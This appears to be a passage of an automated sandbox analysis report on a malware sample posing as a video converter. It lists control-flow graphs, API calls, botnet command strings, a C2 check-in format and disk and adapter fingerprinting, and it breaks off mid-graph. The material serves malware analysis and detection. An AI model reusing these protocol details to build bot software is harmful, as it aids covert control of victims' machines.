2d87ab1-2d87ae2 call 2d8831d call 2d833b2 152->156 157 2d879c7-2d879ce 152->157 156->145 162 2d879d1-2d879d6 157->162 158->48 172 2d8762b 159->172 173 2d87621-2d87629 call 2d8966a 159->173 164 2d875cf-2d875e1 call 2d92790 160->164 162->162 167 2d879d8-2d87a15 call 2d8a658 162->167 175 2d875e3 164->175 176 2d875e6-2d875f6 call 2d93529 164->176 177 2d87a1a-2d87a23 167->177 174 2d8762d-2d87661 call 2d8a782 call 2d83863 172->174 173->174 188 2d87666-2d87682 call 2d85119 174->188 175->176 176->146 176->164 177->156 181 2d87a29-2d87a2f 177->181 185 2d87a32-2d87a37 181->185 185->185 187 2d87a39-2d87a74 call 2d8a658 185->187 187->156 193 2d87a76-2d87aaa call 2d8d04a 187->193 192 2d87687-2d876b8 call 2d83863 call 2d8aa28 188->192 199 2d876bd-2d876cf call 2d8ab42 192->199 196 2d87aaf-2d87ab0 193->196 196->156 201 2d876d4-2d876e5 199->201 202 2d876ec-2d876fb Sleep 201->202 203 2d876e7 call 2d8380b 201->203 204 2d87703-2d87717 call 2d91830 202->204 203->202 207 2d87719-2d87722 call 2d84100 204->207 208 2d87723-2d87731 204->208 207->208 208->158 210 2d87733 call 2d8380b 208->210 210->158
                                                                                APIs
                                                                                • Sleep.KERNELBASE(0000EA60), ref: 02D86708
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D86713
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D86724
                                                                                • _memset.LIBCMT ref: 02D86779
                                                                                • _memset.LIBCMT ref: 02D86788
                                                                                • InternetOpenA.WININET(?), ref: 02D872B5
                                                                                • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D872DD
                                                                                • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D872F5
                                                                                • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D8730D
                                                                                • _memset.LIBCMT ref: 02D8731D
                                                                                • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D87336
                                                                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D87358
                                                                                • InternetCloseHandle.WININET(00000000), ref: 02D87378
                                                                                • InternetCloseHandle.WININET(00000000), ref: 02D87383
                                                                                • _memset.LIBCMT ref: 02D873CB
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D873EE
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D873FF
                                                                                • _malloc.LIBCMT ref: 02D87498
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D874AA
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D874B6
                                                                                • _memset.LIBCMT ref: 02D874D0
                                                                                • _memset.LIBCMT ref: 02D874DF
                                                                                • _memset.LIBCMT ref: 02D874EF
                                                                                • _memset.LIBCMT ref: 02D87502
                                                                                • _memset.LIBCMT ref: 02D87518
                                                                                • _malloc.LIBCMT ref: 02D8758E
                                                                                • _memset.LIBCMT ref: 02D8759F
                                                                                • _strtok.LIBCMT ref: 02D875BF
                                                                                • _swscanf.LIBCMT ref: 02D875D6
                                                                                • _strtok.LIBCMT ref: 02D875ED
                                                                                • _free.LIBCMT ref: 02D875F9
                                                                                • Sleep.KERNEL32(000007D0), ref: 02D876F1
                                                                                • _memset.LIBCMT ref: 02D87765
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D87772
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D87784
                                                                                • _sprintf.LIBCMT ref: 02D87822
                                                                                • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D878E6
                                                                                • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D8791A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                                • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                • API String ID: 696907137-1839899575
                                                                                • Opcode ID: 80aee851289dc6dcf96b44dffecdd40675a2660cc4e1f3aee2420eec86598674
                                                                                • Instruction ID: 8055ac4fbcca87c6e69aa9c61a7d3857ac256a5538fbf6a3c7983847e52625ec
                                                                                • Opcode Fuzzy Hash: 80aee851289dc6dcf96b44dffecdd40675a2660cc4e1f3aee2420eec86598674
                                                                                • Instruction Fuzzy Hash: D332DF32548381AFE725AB24D855FAFBBE6EF85314F10481DF58997391EB709C04CBA2
                                                                                Function 02D8648B Relevance: 82.5, APIs: 42, Strings: 5, Instructions: 228memorysleeplibraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 213 2d8648b-2d866f1 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2d842c7 GetTickCount call 2d8605a GetVersionExA call 2d94a30 call 2d92eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d94a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d92eec * 4 QueryPerformanceCounter Sleep call 2d92eec * 2 call 2d94a30 * 2 259 2d866f4-2d866f6 213->259 260 2d866f8-2d866fd 259->260 261 2d866ff-2d86701 259->261 262 2d86708 Sleep 260->262 263 2d8670e-2d86742 RtlEnterCriticalSection RtlLeaveCriticalSection 261->263 264 2d86703 261->264 262->263 265 2d86792 263->265 266 2d86744-2d86750 263->266 264->262 267 2d86796-2d872c3 InternetOpenA 265->267 266->265 268 2d86752-2d8675f 266->268 273 2d87389-2d8738f 267->273 274 2d872c9-2d87340 InternetSetOptionA * 3 call 2d94a30 InternetOpenUrlA 267->274 270 2d86761-2d86765 268->270 271 2d86767-2d86768 268->271 272 2d8676c-2d86790 call 2d94a30 * 2 270->272 271->272 272->267 276 2d873ab-2d873b9 273->276 277 2d87391-2d87397 273->277 287 2d87382-2d87383 InternetCloseHandle 274->287 288 2d87342 274->288 276->259 279 2d873bf-2d873e3 call 2d94a30 call 2d8439c 276->279 281 2d87399-2d8739b 277->281 282 2d8739d-2d873aa call 2d853ec 277->282 279->259 297 2d873e9-2d87417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d9227c 279->297 281->276 282->276 287->273 292 2d87346-2d8736c InternetReadFile 288->292 294 2d8736e-2d87375 292->294 295 2d87377-2d8737e InternetCloseHandle 292->295 294->292 295->287 300 2d87419-2d8742b call 2d9227c 297->300 301 2d8746d-2d87488 call 2d9227c 297->301 300->301 308 2d8742d-2d8743f call 2d9227c 300->308 306 2d8748e-2d87490 301->306 307 2d87742-2d87754 call 2d9227c 301->307 306->307 309 2d87496-2d87548 call 2d92eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2d94a30 * 5 call 2d8439c * 2 306->309 317 2d8779d-2d877af call 2d9227c 307->317 318 2d87756-2d87758 307->318 308->301 315 2d87441-2d87453 call 2d9227c 308->315 374 2d8754a-2d8754c 309->374 375 2d87585 309->375 315->301 329 2d87455-2d87467 call 2d9227c 315->329 330 2d877d0-2d877e2 call 2d9227c 317->330 331 2d877b1-2d877bf call 2d861f5 call 2d86303 317->331 318->317 322 2d8775a-2d87798 call 2d94a30 RtlEnterCriticalSection RtlLeaveCriticalSection 318->322 322->259 329->259 329->301 342 2d877e8-2d877ea 330->342 343 2d87b00-2d87b12 call 2d9227c 330->343 345 2d877c4-2d877cb call 2d8640e 331->345 342->343 347 2d877f0-2d87807 call 2d8439c 342->347 343->259 355 2d87b18-2d87b46 call 2d92eec call 2d94a30 call 2d8439c 343->355 345->259 347->259 356 2d8780d-2d878db call 2d92358 call 2d81ba7 347->356 376 2d87b48-2d87b4a call 2d8534d 355->376 377 2d87b4f-2d87b56 call 2d92eb4 355->377 372 2d878dd call 2d8143f 356->372 373 2d878e2-2d87903 RtlEnterCriticalSection 356->373 372->373 380 2d8790f-2d87973 RtlLeaveCriticalSection call 2d83c67 call 2d83d7e call 2d8826e 373->380 381 2d87905-2d8790c 373->381 374->375 382 2d8754e-2d87560 call 2d9227c 374->382 378 2d87589-2d875b7 call 2d92eec call 2d94a30 call 2d8439c 375->378 376->377 377->259 405 2d875f8-2d87601 call 2d92eb4 378->405 406 2d875b9-2d875c8 call 2d93529 378->406 403 2d87979-2d879c1 call 2d8a658 380->403 404 2d87ae7-2d87afb call 2d88f36 380->404 381->380 382->375 392 2d87562-2d87583 call 2d8439c 382->392 392->378 415 2d87ab1-2d87ae2 call 2d8831d call 2d833b2 403->415 416 2d879c7-2d879ce 403->416 404->259 417 2d87738-2d8773b 405->417 418 2d87607-2d8761f call 2d93a8f 405->418 406->405 419 2d875ca 406->419 415->404 421 2d879d1-2d879d6 416->421 417->307 431 2d8762b 418->431 432 2d87621-2d87629 call 2d8966a 418->432 423 2d875cf-2d875e1 call 2d92790 419->423 421->421 426 2d879d8-2d87a23 call 2d8a658 421->426 434 2d875e3 423->434 435 2d875e6-2d875f6 call 2d93529 423->435 426->415 440 2d87a29-2d87a2f 426->440 433 2d8762d-2d876cf call 2d8a782 call 2d83863 call 2d85119 call 2d83863 call 2d8aa28 call 2d8ab42 431->433 432->433 460 2d876d4-2d876e5 433->460 434->435 435->405 435->423 444 2d87a32-2d87a37 440->444 444->444 446 2d87a39-2d87a74 call 2d8a658 444->446 446->415 452 2d87a76-2d87aaa call 2d8d04a 446->452 455 2d87aaf-2d87ab0 452->455 455->415 461 2d876ec-2d87717 Sleep call 2d91830 460->461 462 2d876e7 call 2d8380b 460->462 466 2d87719-2d87722 call 2d84100 461->466 467 2d87723-2d87731 461->467 462->461 466->467 467->417 469 2d87733 call 2d8380b 467->469 469->417
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.NTDLL(02DB71B8), ref: 02D864BA
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D864D1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D864DA
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D864E9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D864EC
                                                                                • GetTickCount.KERNEL32 ref: 02D864F8
                                                                                  • Part of subcall function 02D8605A: _malloc.LIBCMT ref: 02D86068
                                                                                • GetVersionExA.KERNEL32(02DB7010), ref: 02D86525
                                                                                • _memset.LIBCMT ref: 02D86544
                                                                                • _malloc.LIBCMT ref: 02D86551
                                                                                  • Part of subcall function 02D92EEC: __FF_MSGBANNER.LIBCMT ref: 02D92F03
                                                                                  • Part of subcall function 02D92EEC: __NMSG_WRITE.LIBCMT ref: 02D92F0A
                                                                                  • Part of subcall function 02D92EEC: RtlAllocateHeap.NTDLL(007A0000,00000000,00000001), ref: 02D92F2F
                                                                                • _malloc.LIBCMT ref: 02D86561
                                                                                • _malloc.LIBCMT ref: 02D8656C
                                                                                • _malloc.LIBCMT ref: 02D86577
                                                                                • _malloc.LIBCMT ref: 02D86582
                                                                                • _malloc.LIBCMT ref: 02D8658D
                                                                                • _malloc.LIBCMT ref: 02D86598
                                                                                • _malloc.LIBCMT ref: 02D865A7
                                                                                • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D865BE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D865C7
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865D6
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D865D9
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865E4
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D865E7
                                                                                • _memset.LIBCMT ref: 02D865FA
                                                                                • _memset.LIBCMT ref: 02D86606
                                                                                • _memset.LIBCMT ref: 02D86613
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D86621
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D8662E
                                                                                • _malloc.LIBCMT ref: 02D86652
                                                                                • _malloc.LIBCMT ref: 02D86660
                                                                                • _malloc.LIBCMT ref: 02D86667
                                                                                • _malloc.LIBCMT ref: 02D8668D
                                                                                • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D866A0
                                                                                • Sleep.KERNELBASE ref: 02D866AE
                                                                                • _malloc.LIBCMT ref: 02D866BA
                                                                                • _malloc.LIBCMT ref: 02D866C7
                                                                                • _memset.LIBCMT ref: 02D866DC
                                                                                • _memset.LIBCMT ref: 02D866EC
                                                                                • Sleep.KERNELBASE(0000EA60), ref: 02D86708
                                                                                • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D86713
                                                                                • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D86724
                                                                                • _memset.LIBCMT ref: 02D86779
                                                                                • _memset.LIBCMT ref: 02D86788
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                • API String ID: 2251652938-2678694477
                                                                                • Opcode ID: d938453a7147966651074ce26eb67acf76acc0b7082b0c11c55fa08fa2afcef2
                                                                                • Instruction ID: 53881320f6604a740c56fe7d81f8204e5e518f3c781d601371b4c28bc2b39a40
                                                                                • Opcode Fuzzy Hash: d938453a7147966651074ce26eb67acf76acc0b7082b0c11c55fa08fa2afcef2
                                                                                • Instruction Fuzzy Hash: DB717271D48340ABE710AF74AC49B5FBBE9EF85724F100819F99597381DAB49C01CFA6
                                                                                Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 970 401b4b-401b68 LoadLibraryA 971 401c21-401c25 970->971 972 401b6e-401b7f GetProcAddress 970->972 973 401b85-401b8e 972->973 974 401c18-401c1b FreeLibrary 972->974 975 401b95-401ba5 GetAdaptersInfo 973->975 974->971 976 401ba7-401bb0 975->976 977 401bdb-401be3 975->977 978 401bc1-401bd7 call 402bc0 call 4018cc 976->978 979 401bb2-401bb6 976->979 980 401be5-401beb call 402ba6 977->980 981 401bec-401bf0 977->981 978->977 979->977 982 401bb8-401bbf 979->982 980->981 985 401bf2-401bf6 981->985 986 401c15-401c17 981->986 982->978 982->979 985->986 989 401bf8-401bfb 985->989 986->974 990 401c06-401c13 call 402b98 989->990 991 401bfd-401c03 989->991 990->975 990->986 991->990
                                                                                APIs
                                                                                • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                • API String ID: 514930453-3667123677
                                                                                • Opcode ID: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                                                • Instruction ID: 9300e3b8f0653b0f10764aaa79a1f2494f67c894d04353eb45b18fdb2f867aae
                                                                                • Opcode Fuzzy Hash: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                                                • Instruction Fuzzy Hash: 9621B870944109AFEF11DF65C944BEF7BB8EF41344F1440BAE504B22E1E778A985CB69
                                                                                Function 02D8F8DA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1044 2d8f8da-2d8f8fd LoadLibraryA 1045 2d8f9bd-2d8f9c4 1044->1045 1046 2d8f903-2d8f911 GetProcAddress 1044->1046 1047 2d8f9b6-2d8f9b7 FreeLibrary 1046->1047 1048 2d8f917-2d8f927 1046->1048 1047->1045 1049 2d8f929-2d8f935 GetAdaptersInfo 1048->1049 1050 2d8f96d-2d8f975 1049->1050 1051 2d8f937 1049->1051 1053 2d8f97e-2d8f983 1050->1053 1054 2d8f977-2d8f97d call 2d936eb 1050->1054 1052 2d8f939-2d8f940 1051->1052 1057 2d8f94a-2d8f952 1052->1057 1058 2d8f942-2d8f946 1052->1058 1055 2d8f9b1-2d8f9b5 1053->1055 1056 2d8f985-2d8f988 1053->1056 1054->1053 1055->1047 1056->1055 1060 2d8f98a-2d8f98f 1056->1060 1062 2d8f955-2d8f95a 1057->1062 1058->1052 1061 2d8f948 1058->1061 1064 2d8f99c-2d8f9a7 call 2d93a8f 1060->1064 1065 2d8f991-2d8f999 1060->1065 1061->1050 1062->1062 1066 2d8f95c-2d8f969 call 2d8f629 1062->1066 1064->1055 1071 2d8f9a9-2d8f9ac 1064->1071 1065->1064 1066->1050 1071->1049
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D8F8F0
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D8F909
                                                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D8F92E
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 02D8F9B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                • API String ID: 514930453-3114217049
                                                                                • Opcode ID: 4c61804baad75c8849e088dad85dbd499fa182b57af56d5da91cfb126a4c15de
                                                                                • Instruction ID: a8e54df250ac2a753870cc034a2f680cfadcbf0d55985a12787fda4456519748
                                                                                • Opcode Fuzzy Hash: 4c61804baad75c8849e088dad85dbd499fa182b57af56d5da91cfb126a4c15de
                                                                                • Instruction Fuzzy Hash: 8721B171E04219AFDB10FFA8D880AEEBBB9EF05310F5440AAE945E7701D7309D45CBA4
                                                                                Function 02D8F7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1129 2d8f7d6-2d8f801 CreateFileA 1130 2d8f8d2-2d8f8d9 1129->1130 1131 2d8f807-2d8f81c 1129->1131 1132 2d8f81f-2d8f841 DeviceIoControl 1131->1132 1133 2d8f87a-2d8f882 1132->1133 1134 2d8f843-2d8f84b 1132->1134 1137 2d8f88b-2d8f88d 1133->1137 1138 2d8f884-2d8f88a call 2d936eb 1133->1138 1135 2d8f84d-2d8f852 1134->1135 1136 2d8f854-2d8f859 1134->1136 1135->1133 1136->1133 1139 2d8f85b-2d8f863 1136->1139 1141 2d8f8c8-2d8f8d1 CloseHandle 1137->1141 1142 2d8f88f-2d8f892 1137->1142 1138->1137 1143 2d8f866-2d8f86b 1139->1143 1141->1130 1145 2d8f8ae-2d8f8bb call 2d93a8f 1142->1145 1146 2d8f894-2d8f89d GetLastError 1142->1146 1143->1143 1149 2d8f86d-2d8f879 call 2d8f629 1143->1149 1145->1141 1153 2d8f8bd-2d8f8c3 1145->1153 1146->1141 1147 2d8f89f-2d8f8a2 1146->1147 1147->1145 1150 2d8f8a4-2d8f8ab 1147->1150 1149->1133 1150->1145 1153->1132
                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D8F7F5
                                                                                • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D8F833
                                                                                • GetLastError.KERNEL32 ref: 02D8F894
                                                                                • CloseHandle.KERNELBASE(?), ref: 02D8F8CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                • String ID: \\.\PhysicalDrive0
                                                                                • API String ID: 4026078076-1180397377
                                                                                • Opcode ID: a480a95bded2e81307a930fd07ab66bb35d41bfc5ba2148c1187e43381dfc378
                                                                                • Instruction ID: 34115afae4896a8c48865a946f8dc94fcd511a992cf889da288502b1318b73a4
                                                                                • Opcode Fuzzy Hash: a480a95bded2e81307a930fd07ab66bb35d41bfc5ba2148c1187e43381dfc378
                                                                                • Instruction Fuzzy Hash: 3B31D0B1D0021AAFDB24EF95D884BAEBBB9FF05710F70416AE504A3780D7709E04CBA0
                                                                                Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1155 401a4f-401a77 CreateFileA 1156 401b45-401b4a 1155->1156 1157 401a7d-401a91 1155->1157 1158 401a98-401ac0 DeviceIoControl 1157->1158 1159 401ac2-401aca 1158->1159 1160 401af3-401afb 1158->1160 1161 401ad4-401ad9 1159->1161 1162 401acc-401ad2 1159->1162 1163 401b04-401b07 1160->1163 1164 401afd-401b03 call 402ba6 1160->1164 1161->1160 1165 401adb-401af1 call 402bc0 call 4018cc 1161->1165 1162->1160 1167 401b09-401b0c 1163->1167 1168 401b3a-401b44 CloseHandle 1163->1168 1164->1163 1165->1160 1171 401b27-401b34 call 402b98 1167->1171 1172 401b0e-401b17 GetLastError 1167->1172 1168->1156 1171->1158 1171->1168 1172->1168 1175 401b19-401b1c 1172->1175 1175->1171 1178 401b1e-401b24 1175->1178 1178->1171
                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                • GetLastError.KERNEL32 ref: 00401B0E
                                                                                • CloseHandle.KERNELBASE(?), ref: 00401B3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                • String ID: \\.\PhysicalDrive0
                                                                                • API String ID: 4026078076-1180397377
                                                                                • Opcode ID: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                                                • Instruction ID: c07866d4b4e887281577b2397114bebd63d98cfae9bba907e2345ee80fd6f57b
                                                                                • Opcode Fuzzy Hash: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                                                • Instruction Fuzzy Hash: 00316D71D01118EACB21EFA5CD849EFBBB9FF41750F20417AE515B22A0E3786E45CB98
                                                                                Function 02D86429 Relevance: 82.5, APIs: 42, Strings: 5, Instructions: 227memorylibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 472 2d86429-2d8643f 473 2d864ae-2d866f1 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2d842c7 GetTickCount call 2d8605a GetVersionExA call 2d94a30 call 2d92eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d94a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d92eec * 4 QueryPerformanceCounter Sleep call 2d92eec * 2 call 2d94a30 * 2 472->473 474 2d86441-2d86444 472->474 519 2d866f4-2d866f6 473->519 474->473 520 2d866f8-2d866fd 519->520 521 2d866ff-2d86701 519->521 522 2d86708 Sleep 520->522 523 2d8670e-2d86742 RtlEnterCriticalSection RtlLeaveCriticalSection 521->523 524 2d86703 521->524 522->523 525 2d86792 523->525 526 2d86744-2d86750 523->526 524->522 527 2d86796-2d872c3 InternetOpenA 525->527 526->525 528 2d86752-2d8675f 526->528 533 2d87389-2d8738f 527->533 534 2d872c9-2d87340 InternetSetOptionA * 3 call 2d94a30 InternetOpenUrlA 527->534 530 2d86761-2d86765 528->530 531 2d86767-2d86768 528->531 532 2d8676c-2d86790 call 2d94a30 * 2 530->532 531->532 532->527 536 2d873ab-2d873b9 533->536 537 2d87391-2d87397 533->537 547 2d87382-2d87383 InternetCloseHandle 534->547 548 2d87342 534->548 536->519 539 2d873bf-2d873e3 call 2d94a30 call 2d8439c 536->539 541 2d87399-2d8739b 537->541 542 2d8739d-2d873aa call 2d853ec 537->542 539->519 557 2d873e9-2d87417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d9227c 539->557 541->536 542->536 547->533 552 2d87346-2d8736c InternetReadFile 548->552 554 2d8736e-2d87375 552->554 555 2d87377-2d8737e InternetCloseHandle 552->555 554->552 555->547 560 2d87419-2d8742b call 2d9227c 557->560 561 2d8746d-2d87488 call 2d9227c 557->561 560->561 568 2d8742d-2d8743f call 2d9227c 560->568 566 2d8748e-2d87490 561->566 567 2d87742-2d87754 call 2d9227c 561->567 566->567 569 2d87496-2d87548 call 2d92eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2d94a30 * 5 call 2d8439c * 2 566->569 577 2d8779d-2d877af call 2d9227c 567->577 578 2d87756-2d87758 567->578 568->561 575 2d87441-2d87453 call 2d9227c 568->575 634 2d8754a-2d8754c 569->634 635 2d87585 569->635 575->561 589 2d87455-2d87467 call 2d9227c 575->589 590 2d877d0-2d877e2 call 2d9227c 577->590 591 2d877b1-2d877cb call 2d861f5 call 2d86303 call 2d8640e 577->591 578->577 582 2d8775a-2d87798 call 2d94a30 RtlEnterCriticalSection RtlLeaveCriticalSection 578->582 582->519 589->519 589->561 602 2d877e8-2d877ea 590->602 603 2d87b00-2d87b12 call 2d9227c 590->603 591->519 602->603 607 2d877f0-2d87807 call 2d8439c 602->607 603->519 615 2d87b18-2d87b46 call 2d92eec call 2d94a30 call 2d8439c 603->615 607->519 616 2d8780d-2d878db call 2d92358 call 2d81ba7 607->616 636 2d87b48-2d87b4a call 2d8534d 615->636 637 2d87b4f-2d87b56 call 2d92eb4 615->637 632 2d878dd call 2d8143f 616->632 633 2d878e2-2d87903 RtlEnterCriticalSection 616->633 632->633 640 2d8790f-2d87973 RtlLeaveCriticalSection call 2d83c67 call 2d83d7e call 2d8826e 633->640 641 2d87905-2d8790c 633->641 634->635 642 2d8754e-2d87560 call 2d9227c 634->642 638 2d87589-2d875b7 call 2d92eec call 2d94a30 call 2d8439c 635->638 636->637 637->519 665 2d875f8-2d87601 call 2d92eb4 638->665 666 2d875b9-2d875c8 call 2d93529 638->666 663 2d87979-2d879c1 call 2d8a658 640->663 664 2d87ae7-2d87afb call 2d88f36 640->664 641->640 642->635 652 2d87562-2d87583 call 2d8439c 642->652 652->638 675 2d87ab1-2d87ae2 call 2d8831d call 2d833b2 663->675 676 2d879c7-2d879ce 663->676 664->519 677 2d87738-2d8773b 665->677 678 2d87607-2d8761f call 2d93a8f 665->678 666->665 679 2d875ca 666->679 675->664 681 2d879d1-2d879d6 676->681 677->567 691 2d8762b 678->691 692 2d87621-2d87629 call 2d8966a 678->692 683 2d875cf-2d875e1 call 2d92790 679->683 681->681 686 2d879d8-2d87a23 call 2d8a658 681->686 694 2d875e3 683->694 695 2d875e6-2d875f6 call 2d93529 683->695 686->675 700 2d87a29-2d87a2f 686->700 693 2d8762d-2d876e5 call 2d8a782 call 